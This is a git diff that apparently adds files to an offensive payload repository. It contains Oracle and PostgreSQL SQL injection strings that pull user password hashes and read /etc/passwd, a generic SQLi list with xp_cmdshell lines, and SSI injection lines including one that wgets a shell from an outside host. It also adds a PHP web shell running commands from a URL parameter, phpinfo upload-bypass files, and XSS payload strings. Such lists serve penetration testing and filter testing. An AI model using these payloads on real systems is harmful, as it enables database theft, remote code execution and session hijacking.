' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
|
||||||
|
|
20
SQL injection/Payloads/FUZZDB_PostgresEnumeration.txt
Normal file
20
SQL injection/Payloads/FUZZDB_PostgresEnumeration.txt
Normal file
@ -0,0 +1,20 @@
|
|||||||
|
# info disclosure payload fuzzfile for pgsql
|
||||||
|
select version();
|
||||||
|
select current_database();
|
||||||
|
select current_user;
|
||||||
|
select session_user;
|
||||||
|
select current_setting('log_connections');
|
||||||
|
select current_setting('log_statement');
|
||||||
|
select current_setting('port');
|
||||||
|
select current_setting('password_encryption');
|
||||||
|
select current_setting('krb_server_keyfile');
|
||||||
|
select current_setting('virtual_host');
|
||||||
|
select current_setting('port');
|
||||||
|
select current_setting('config_file');
|
||||||
|
select current_setting('hba_file');
|
||||||
|
select current_setting('data_directory');
|
||||||
|
select * from pg_shadow;
|
||||||
|
select * from pg_group;
|
||||||
|
create table myfile (input TEXT);
|
||||||
|
copy myfile from '/etc/passwd';
|
||||||
|
select * from myfile;copy myfile to /tmp/test;
|
267
SQL injection/Payloads/Generic_SQLi
Normal file
267
SQL injection/Payloads/Generic_SQLi
Normal file
@ -0,0 +1,267 @@
|
|||||||
|
)%20or%20('x'='x
|
||||||
|
%20or%201=1
|
||||||
|
; execute immediate 'sel' || 'ect us' || 'er'
|
||||||
|
benchmark(10000000,MD5(1))#
|
||||||
|
update
|
||||||
|
";waitfor delay '0:0:__TIME__'--
|
||||||
|
1) or pg_sleep(__TIME__)--
|
||||||
|
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
||||||
|
"hi"") or (""a""=""a"
|
||||||
|
delete
|
||||||
|
like
|
||||||
|
" or sleep(__TIME__)#
|
||||||
|
pg_sleep(__TIME__)--
|
||||||
|
*(|(objectclass=*))
|
||||||
|
declare @q nvarchar (200) 0x730065006c00650063 ...
|
||||||
|
or 0=0 #
|
||||||
|
insert
|
||||||
|
1) or sleep(__TIME__)#
|
||||||
|
) or ('a'='a
|
||||||
|
; exec xp_regread
|
||||||
|
*|
|
||||||
|
@var select @var as var into temp end --
|
||||||
|
1)) or benchmark(10000000,MD5(1))#
|
||||||
|
asc
|
||||||
|
(||6)
|
||||||
|
"a"" or 3=3--"
|
||||||
|
" or benchmark(10000000,MD5(1))#
|
||||||
|
# from wapiti
|
||||||
|
or 0=0 --
|
||||||
|
1 waitfor delay '0:0:10'--
|
||||||
|
or 'a'='a
|
||||||
|
hi or 1=1 --"
|
||||||
|
or a = a
|
||||||
|
UNION ALL SELECT
|
||||||
|
) or sleep(__TIME__)='
|
||||||
|
)) or benchmark(10000000,MD5(1))#
|
||||||
|
hi' or 'a'='a
|
||||||
|
0
|
||||||
|
21 %
|
||||||
|
limit
|
||||||
|
or 1=1
|
||||||
|
or 2 > 1
|
||||||
|
")) or benchmark(10000000,MD5(1))#
|
||||||
|
PRINT
|
||||||
|
hi') or ('a'='a
|
||||||
|
or 3=3
|
||||||
|
));waitfor delay '0:0:__TIME__'--
|
||||||
|
a' waitfor delay '0:0:10'--
|
||||||
|
1;(load_file(char(47,101,116,99,47,112,97,115, ...
|
||||||
|
or%201=1
|
||||||
|
1 or sleep(__TIME__)#
|
||||||
|
or 1=1
|
||||||
|
and 1 in (select var from temp)--
|
||||||
|
or '7659'='7659
|
||||||
|
or 'text' = n'text'
|
||||||
|
--
|
||||||
|
or 1=1 or ''='
|
||||||
|
declare @s varchar (200) select @s = 0x73656c6 ...
|
||||||
|
exec xp
|
||||||
|
; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
||||||
|
3.10E+17
|
||||||
|
" or pg_sleep(__TIME__)--
|
||||||
|
x' AND email IS NULL; --
|
||||||
|
&
|
||||||
|
admin' or '
|
||||||
|
or 'unusual' = 'unusual'
|
||||||
|
//
|
||||||
|
truncate
|
||||||
|
1) or benchmark(10000000,MD5(1))#
|
||||||
|
\x27UNION SELECT
|
||||||
|
declare @s varchar(200) select @s = 0x77616974 ...
|
||||||
|
tz_offset
|
||||||
|
sqlvuln
|
||||||
|
"));waitfor delay '0:0:__TIME__'--
|
||||||
|
||6
|
||||||
|
or%201=1 --
|
||||||
|
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||||
|
or a=a
|
||||||
|
) union select * from information_schema.tables;
|
||||||
|
PRINT @@variable
|
||||||
|
or isNULL(1/0) /*
|
||||||
|
26 %
|
||||||
|
" or "a"="a
|
||||||
|
(sqlvuln)
|
||||||
|
x' AND members.email IS NULL; --
|
||||||
|
or 1=1--
|
||||||
|
and 1=( if((load_file(char(110,46,101,120,11 ...
|
||||||
|
0x770061006900740066006F0072002000640065006C00 ...
|
||||||
|
%20'sleep%2050'
|
||||||
|
as
|
||||||
|
1)) or pg_sleep(__TIME__)--
|
||||||
|
/**/or/**/1/**/=/**/1
|
||||||
|
union all select @@version--
|
||||||
|
,@variable
|
||||||
|
(sqlattempt2)
|
||||||
|
or (EXISTS)
|
||||||
|
t'exec master..xp_cmdshell 'nslookup www.googl ...
|
||||||
|
%20$(sleep%2050)
|
||||||
|
1 or benchmark(10000000,MD5(1))#
|
||||||
|
%20or%20''='
|
||||||
|
||UTL_HTTP.REQUEST
|
||||||
|
or pg_sleep(__TIME__)--
|
||||||
|
hi' or 'x'='x';
|
||||||
|
") or sleep(__TIME__)="
|
||||||
|
or 'whatever' in ('whatever')
|
||||||
|
; begin declare @var varchar(8000) set @var=' ...
|
||||||
|
union select 1,load_file('/etc/passwd'),1,1,1;
|
||||||
|
0x77616974666F722064656C61792027303A303A313027 ...
|
||||||
|
exec(@s)
|
||||||
|
) or pg_sleep(__TIME__)--
|
||||||
|
union select
|
||||||
|
or sleep(__TIME__)#
|
||||||
|
select * from information_schema.tables--
|
||||||
|
a' or 1=1--
|
||||||
|
a' or 'a' = 'a
|
||||||
|
declare @s varchar(22) select @s =
|
||||||
|
or 2 between 1 and 3
|
||||||
|
or a=a--
|
||||||
|
or '1'='1
|
||||||
|
|
|
||||||
|
or sleep(__TIME__)='
|
||||||
|
or 1 --'
|
||||||
|
or 0=0 #"
|
||||||
|
having
|
||||||
|
a'
|
||||||
|
" or isNULL(1/0) /*
|
||||||
|
declare @s varchar (8000) select @s = 0x73656c ...
|
||||||
|
â or 1=1 --
|
||||||
|
char%4039%41%2b%40SELECT
|
||||||
|
order by
|
||||||
|
bfilename
|
||||||
|
having 1=1--
|
||||||
|
) or benchmark(10000000,MD5(1))#
|
||||||
|
or username like char(37);
|
||||||
|
;waitfor delay '0:0:__TIME__'--
|
||||||
|
" or 1=1--
|
||||||
|
x' AND userid IS NULL; --
|
||||||
|
*/*
|
||||||
|
or 'text' > 't'
|
||||||
|
(select top 1
|
||||||
|
or benchmark(10000000,MD5(1))#
|
||||||
|
");waitfor delay '0:0:__TIME__'--
|
||||||
|
a' or 3=3--
|
||||||
|
-- &password=
|
||||||
|
group by userid having 1=1--
|
||||||
|
or ''='
|
||||||
|
; exec master..xp_cmdshell
|
||||||
|
%20or%20x=x
|
||||||
|
select
|
||||||
|
")) or sleep(__TIME__)="
|
||||||
|
0x730065006c0065006300740020004000400076006500 ...
|
||||||
|
hi' or 1=1 --
|
||||||
|
") or pg_sleep(__TIME__)--
|
||||||
|
%20or%20'x'='x
|
||||||
|
or 'something' = 'some'+'thing'
|
||||||
|
exec sp
|
||||||
|
29 %
|
||||||
|
(
|
||||||
|
ý or 1=1 --
|
||||||
|
1 or pg_sleep(__TIME__)--
|
||||||
|
0 or 1=1
|
||||||
|
) or (a=a
|
||||||
|
uni/**/on sel/**/ect
|
||||||
|
replace
|
||||||
|
%27%20or%201=1
|
||||||
|
)) or pg_sleep(__TIME__)--
|
||||||
|
%7C
|
||||||
|
x' AND 1=(SELECT COUNT(*) FROM tabname); --
|
||||||
|
'%20OR
|
||||||
|
; or '1'='1'
|
||||||
|
declare @q nvarchar (200) select @q = 0x770061 ...
|
||||||
|
1 or 1=1
|
||||||
|
; exec ('sel' + 'ect us' + 'er')
|
||||||
|
23 OR 1=1
|
||||||
|
/
|
||||||
|
anything' OR 'x'='x
|
||||||
|
declare @q nvarchar (4000) select @q =
|
||||||
|
or 0=0 --
|
||||||
|
desc
|
||||||
|
||'6
|
||||||
|
)
|
||||||
|
1)) or sleep(__TIME__)#
|
||||||
|
or 0=0 #
|
||||||
|
select name from syscolumns where id = (sele ...
|
||||||
|
hi or a=a
|
||||||
|
*(|(mail=*))
|
||||||
|
password:*/=1--
|
||||||
|
distinct
|
||||||
|
);waitfor delay '0:0:__TIME__'--
|
||||||
|
to_timestamp_tz
|
||||||
|
") or benchmark(10000000,MD5(1))#
|
||||||
|
UNION SELECT
|
||||||
|
%2A%28%7C%28mail%3D%2A%29%29
|
||||||
|
+sqlvuln
|
||||||
|
or 1=1 /*
|
||||||
|
)) or sleep(__TIME__)='
|
||||||
|
or 1=1 or ""=
|
||||||
|
or 1 in (select @@version)--
|
||||||
|
sqlvuln;
|
||||||
|
union select * from users where login = char ...
|
||||||
|
x' or 1=1 or 'x'='y
|
||||||
|
28 %
|
||||||
|
â or 3=3 --
|
||||||
|
@variable
|
||||||
|
or '1'='1'--
|
||||||
|
"a"" or 1=1--"
|
||||||
|
//*
|
||||||
|
%2A%7C
|
||||||
|
" or 0=0 --
|
||||||
|
")) or pg_sleep(__TIME__)--
|
||||||
|
?
|
||||||
|
or 1/*
|
||||||
|
!
|
||||||
|
'
|
||||||
|
or a = a
|
||||||
|
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
|
||||||
|
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
||||||
|
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
||||||
|
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
|
||||||
|
' or 1=1
|
||||||
|
or 1=1 --
|
||||||
|
x' OR full_name LIKE '%Bob%
|
||||||
|
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
||||||
|
'%20or%20''='
|
||||||
|
'%20or%20'x'='x
|
||||||
|
')%20or%20('x'='x
|
||||||
|
' or 0=0 --
|
||||||
|
' or 0=0 #
|
||||||
|
or 0=0 #"
|
||||||
|
' or 1=1--
|
||||||
|
' or '1'='1'--
|
||||||
|
' or 1 --'
|
||||||
|
or 1=1--
|
||||||
|
' or 1=1 or ''='
|
||||||
|
or 1=1 or ""=
|
||||||
|
' or a=a--
|
||||||
|
or a=a
|
||||||
|
') or ('a'='a
|
||||||
|
'hi' or 'x'='x';
|
||||||
|
or
|
||||||
|
procedure
|
||||||
|
handler
|
||||||
|
' or username like '%
|
||||||
|
' or uname like '%
|
||||||
|
' or userid like '%
|
||||||
|
' or uid like '%
|
||||||
|
' or user like '%
|
||||||
|
'; exec master..xp_cmdshell
|
||||||
|
'; exec xp_regread
|
||||||
|
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
||||||
|
--sp_password
|
||||||
|
' UNION SELECT
|
||||||
|
' UNION ALL SELECT
|
||||||
|
' or (EXISTS)
|
||||||
|
' (select top 1
|
||||||
|
'||UTL_HTTP.REQUEST
|
||||||
|
1;SELECT%20*
|
||||||
|
<>"'%;)(&+
|
||||||
|
'%20or%201=1
|
||||||
|
'sqlattempt1
|
||||||
|
%28
|
||||||
|
%29
|
||||||
|
%26
|
||||||
|
%21
|
||||||
|
' or ''='
|
||||||
|
' or 3=3
|
||||||
|
or 3=3 --
|
2
SQL injection/Payloads/SQLi_Polyglots.txt
Normal file
2
SQL injection/Payloads/SQLi_Polyglots.txt
Normal file
@ -0,0 +1,2 @@
|
|||||||
|
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
|
||||||
|
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample
|
75
Template injections/JHADDIX_SSI_Injection.txt
Normal file
75
Template injections/JHADDIX_SSI_Injection.txt
Normal file
@ -0,0 +1,75 @@
|
|||||||
|
<pre><!--#exec cmd="ls" --></pre>
|
||||||
|
<pre><!--#echo var="DATE_LOCAL" --> </pre>
|
||||||
|
<pre><!--#exec cmd="whoami"--></pre>
|
||||||
|
<pre><!--#exec cmd="dir" --></pre>
|
||||||
|
<!--#exec cmd="ls" -->
|
||||||
|
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
|
||||||
|
<!--#exec cmd="/bin/ls /" -->
|
||||||
|
<!--#exec cmd="dir" -->
|
||||||
|
<!--#exec cmd="cd C:\WINDOWS\System32">
|
||||||
|
<!--#config errmsg="File not found, informs users and password"-->
|
||||||
|
<!--#echo var="DOCUMENT_NAME" -->
|
||||||
|
<!--#echo var="DOCUMENT_URI" -->
|
||||||
|
<!--#config timefmt="A %B %d %Y %r"-->
|
||||||
|
<!--#fsize file="ssi.shtml" -->
|
||||||
|
<!--#include file=?UUUUUUUU...UU?-->
|
||||||
|
<!--#echo var="DATE_LOCAL" -->
|
||||||
|
<!--#exec cmd="whoami"-->
|
||||||
|
<!--#printenv -->
|
||||||
|
<!--#flastmod virtual="echo.html" -->
|
||||||
|
<!--#echo var="auth_type" -->
|
||||||
|
<!--#echo var="http_referer" -->
|
||||||
|
<!--#echo var="content_length" -->
|
||||||
|
<!--#echo var="content_type" -->
|
||||||
|
<!--#echo var="http_accept_encoding" -->
|
||||||
|
<!--#echo var="forwarded" -->
|
||||||
|
<!--#echo var="document_uri" -->
|
||||||
|
<!--#echo var="date_gmt" -->
|
||||||
|
<!--#echo var="date_local" -->
|
||||||
|
<!--#echo var="document_name" -->
|
||||||
|
<!--#echo var="document_root" -->
|
||||||
|
<!--#echo var="from" -->
|
||||||
|
<!--#echo var="gateway_interface" -->
|
||||||
|
<!--#echo var="http_accept" -->
|
||||||
|
<!--#echo var="http_accept_charset" -->
|
||||||
|
<!--#echo var="http_accept_language" -->
|
||||||
|
<!--#echo var="http_connection" -->
|
||||||
|
<!--#echo var="http_cookie" -->
|
||||||
|
<!--#echo var="http_form" -->
|
||||||
|
<!--#echo var="http_host" -->
|
||||||
|
<!--#echo var="user_name" -->
|
||||||
|
<!--#echo var="unique_id" -->
|
||||||
|
<!--#echo var="tz" -->
|
||||||
|
<!--#echo var="total_hits" -->
|
||||||
|
<!--#echo var="server_software" -->
|
||||||
|
<!--#echo var="server_protocol" -->
|
||||||
|
<!--#echo var="server_port" -->
|
||||||
|
<!--#echo var="server_name -->
|
||||||
|
<!--#echo var="server_addr" -->
|
||||||
|
<!--#echo var="server_admin" -->
|
||||||
|
<!--#echo var="script_url" -->
|
||||||
|
<!--#echo var="script_uri" -->
|
||||||
|
<!--#echo var="script_name" -->
|
||||||
|
<!--#echo var="script_filename" -->
|
||||||
|
<!--#echo var="netsite_root" -->
|
||||||
|
<!--#echo var="site_htmlroot" -->
|
||||||
|
<!--#echo var="path_translated" -->
|
||||||
|
<!--#echo var="path_info_translated" -->
|
||||||
|
<!--#echo var="request_uri" -->
|
||||||
|
<!--#echo var="request_method" -->
|
||||||
|
<!--#echo var="remote_user" -->
|
||||||
|
<!--#echo var="remote_addr" -->
|
||||||
|
<!--#echo var="http_client_ip" -->
|
||||||
|
<!--#echo var="remote_port" -->
|
||||||
|
<!--#echo var="remote_ident" -->
|
||||||
|
<!--#echo var="remote_host" -->
|
||||||
|
<!--#echo var="query_string_unescaped" -->
|
||||||
|
<!--#echo var="query_string" -->
|
||||||
|
<!--#echo var="path_translated" -->
|
||||||
|
<!--#echo var="path_info" -->
|
||||||
|
<!--#echo var="path" -->
|
||||||
|
<!--#echo var="page_count" -->
|
||||||
|
<!--#echo var="last_modified" -->
|
||||||
|
<!--#echo var="http_user_agent" -->
|
||||||
|
<!--#echo var="http_ua_os" -->
|
||||||
|
<!--#echo var="http_ua_cpu" -->
|
BIN
Upload insecure files/Insecure Flash/xssproject.swf
Normal file
BIN
Upload insecure files/Insecure Flash/xssproject.swf
Normal file
Binary file not shown.
BIN
Upload insecure files/Metadata GIF/phpinfo-metadata.gif
Normal file
BIN
Upload insecure files/Metadata GIF/phpinfo-metadata.gif
Normal file
Binary file not shown.
After Width: | Height: | Size: 7.2 KiB |
BIN
Upload insecure files/Metadata PNG/phpinfo-metadata.jpg
Normal file
BIN
Upload insecure files/Metadata PNG/phpinfo-metadata.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 74 KiB |
1
Upload insecure files/PHP Extension/Shell.phpt
Executable file
1
Upload insecure files/PHP Extension/Shell.phpt
Executable file
@ -0,0 +1 @@
|
|||||||
|
<?php echo "Shell";system($_GET['cmd']); ?>
|
1
Upload insecure files/PHP Extension/phpinfo.jpg.php
Normal file
1
Upload insecure files/PHP Extension/phpinfo.jpg.php
Normal file
@ -0,0 +1 @@
|
|||||||
|
<?php phpinfo(); ?>
|
1
Upload insecure files/PHP Extension/phpinfo.php
Normal file
1
Upload insecure files/PHP Extension/phpinfo.php
Normal file
@ -0,0 +1 @@
|
|||||||
|
<?php phpinfo(); ?>
|
1
Upload insecure files/PHP Extension/phpinfo.php3
Normal file
1
Upload insecure files/PHP Extension/phpinfo.php3
Normal file
@ -0,0 +1 @@
|
|||||||
|
<?php phpinfo(); ?>
|
1
Upload insecure files/PHP Extension/phpinfo.php4
Normal file
1
Upload insecure files/PHP Extension/phpinfo.php4
Normal file
@ -0,0 +1 @@
|
|||||||
|
<?php phpinfo(); ?>
|
1
Upload insecure files/PHP Extension/phpinfo.php5
Normal file
1
Upload insecure files/PHP Extension/phpinfo.php5
Normal file
@ -0,0 +1 @@
|
|||||||
|
<?php phpinfo(); ?>
|
1
Upload insecure files/PHP Extension/phpinfo.php7
Normal file
1
Upload insecure files/PHP Extension/phpinfo.php7
Normal file
@ -0,0 +1 @@
|
|||||||
|
<?php phpinfo(); ?>
|
1
Upload insecure files/PHP Extension/phpinfo.phpt
Normal file
1
Upload insecure files/PHP Extension/phpinfo.phpt
Normal file
@ -0,0 +1 @@
|
|||||||
|
<?php phpinfo(); ?>
|
1
Upload insecure files/PHP Extension/phpinfo.pht
Normal file
1
Upload insecure files/PHP Extension/phpinfo.pht
Normal file
@ -0,0 +1 @@
|
|||||||
|
<?php phpinfo(); ?>
|
1
Upload insecure files/PHP Extension/phpinfo.phtml
Normal file
1
Upload insecure files/PHP Extension/phpinfo.phtml
Normal file
@ -0,0 +1 @@
|
|||||||
|
<?php phpinfo(); ?>
|
@ -1,5 +1,5 @@
|
|||||||
# Upload
|
# Upload
|
||||||
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
|
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
|
||||||
|
|
||||||
## Exploits
|
## Exploits
|
||||||
Image Tragik
|
Image Tragik
|
||||||
@ -36,5 +36,20 @@ JPG Bypass a resize - Upload the picture and use a local file inclusion
|
|||||||
http://localhost/test.php?c=ls
|
http://localhost/test.php?c=ls
|
||||||
```
|
```
|
||||||
|
|
||||||
|
XSS via SWF
|
||||||
|
```
|
||||||
|
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
|
||||||
|
|
||||||
|
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
|
||||||
|
|
||||||
|
Examples:
|
||||||
|
|
||||||
|
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
|
||||||
|
|
||||||
|
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
|
||||||
|
|
||||||
|
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
||||||
|
```
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|
||||||
|
17
XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt
Normal file
17
XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt
Normal file
@ -0,0 +1,17 @@
|
|||||||
|
alert`1`
|
||||||
|
alert(1)
|
||||||
|
alert(1)
|
||||||
|
alert(1)
|
||||||
|
(alert)(1)
|
||||||
|
a=alert,a(1)
|
||||||
|
[1].find(alert)
|
||||||
|
top["al"+"ert"](1)
|
||||||
|
top[/al/.source+/ert/.source](1)
|
||||||
|
al\u0065rt(1)
|
||||||
|
top['al\145rt'](1)
|
||||||
|
top['al\x65rt'](1)
|
||||||
|
top[8680439..toString(30)](1)
|
||||||
|
navigator.vibrate(500)
|
||||||
|
eval(URL.slice(-8))>#alert(1)
|
||||||
|
eval(location.hash.slice(1)>#alert(1)
|
||||||
|
innerHTML=location.hash>#<script>alert(1)</script>
|
113
XSS injection/BRUTELOGIC-XSS-STRINGS.txt
Normal file
113
XSS injection/BRUTELOGIC-XSS-STRINGS.txt
Normal file
@ -0,0 +1,113 @@
|
|||||||
|
<svg onload=alert(1)>
|
||||||
|
"><svg onload=alert(1)//
|
||||||
|
"onmouseover=alert(1)//
|
||||||
|
"autofocus/onfocus=alert(1)//
|
||||||
|
'-alert(1)-'
|
||||||
|
'-alert(1)//
|
||||||
|
\'-alert(1)//
|
||||||
|
</script><svg onload=alert(1)>
|
||||||
|
<x contenteditable onblur=alert(1)>lose focus!
|
||||||
|
<x onclick=alert(1)>click this!
|
||||||
|
<x oncopy=alert(1)>copy this!
|
||||||
|
<x oncontextmenu=alert(1)>right click this!
|
||||||
|
<x oncut=alert(1)>copy this!
|
||||||
|
<x ondblclick=alert(1)>double click this!
|
||||||
|
<x ondrag=alert(1)>drag this!
|
||||||
|
<x contenteditable onfocus=alert(1)>focus this!
|
||||||
|
<x contenteditable oninput=alert(1)>input here!
|
||||||
|
<x contenteditable onkeydown=alert(1)>press any key!
|
||||||
|
<x contenteditable onkeypress=alert(1)>press any key!
|
||||||
|
<x contenteditable onkeyup=alert(1)>press any key!
|
||||||
|
<x onmousedown=alert(1)>click this!
|
||||||
|
<x onmousemove=alert(1)>hover this!
|
||||||
|
<x onmouseout=alert(1)>hover this!
|
||||||
|
<x onmouseover=alert(1)>hover this!
|
||||||
|
<x onmouseup=alert(1)>click this!
|
||||||
|
<x contenteditable onpaste=alert(1)>paste here!
|
||||||
|
<script>alert(1)//
|
||||||
